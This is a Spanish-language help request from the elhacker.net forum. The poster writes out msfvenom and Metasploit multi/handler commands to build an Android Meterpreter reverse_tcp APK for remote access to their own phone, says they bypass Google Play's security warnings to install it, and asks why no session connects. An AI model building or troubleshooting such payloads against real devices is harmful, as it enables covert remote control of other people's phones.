elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / android/reverse_tcp metasploit (AYUDA!) en: 18 Marzo 2022, 08:44 am
Estoy aprendiendo a acceder remotamente a un dispositivo poniendo en practica mi propio dispositivo Android pero da un problema así que explicare como estoy haciendo:
(cabe destacar que estoy usando un punto de acceso a wifi remoto 'uno de mis moviles')

abro la terminal y pongo lo siguiente:

msfvenom -p android/meterpreter/reverse_tcp lhost=(ip_portmap) lport=(puerto_portmap) > /root/Escritorio/salida.apk
(tambien intente en lhost poner mi ip local y en lport 4545, a su vez intente tambien en lhost mi ip publica)

luego abro una terminal y uso openvpn (aqui la direccion de el archivo descargado desde portmap)

luego de que el apk se crea correctamente ejecuto metasploit v6.1.27-dev y uso los siguientes comandos:
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverce_tcp
set LHOST (mi ip local)
set LPORT 4545 (el puerto colocado en portmap)
exploit -j

y me sale el siguiente mensaje:

exploit running as background job 0.
exploit completed, but no sessions was created.
started reverse tcp handler on 10.0.2.15:5555

hasta ahí todo va bien pero que pasa luego de todo ese proceso instalo el apk en mi teléfono, me salto las verificaciones de seguridad de Google play, le doy a instalar de todas maneras y fino se instala, luego de ahí ejecuto el mainactivity desde mi teléfono y no pasa absolutamente nada, la terminal de kali se queda tal cual estaba, ejecuto el comando sessions y me sale que no hay ninguna sesión activa y la verdad es que no entiendo que es lo que estoy haciendo mal, si alguien me podría ayudar lo agradecería mucho.  :'(
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines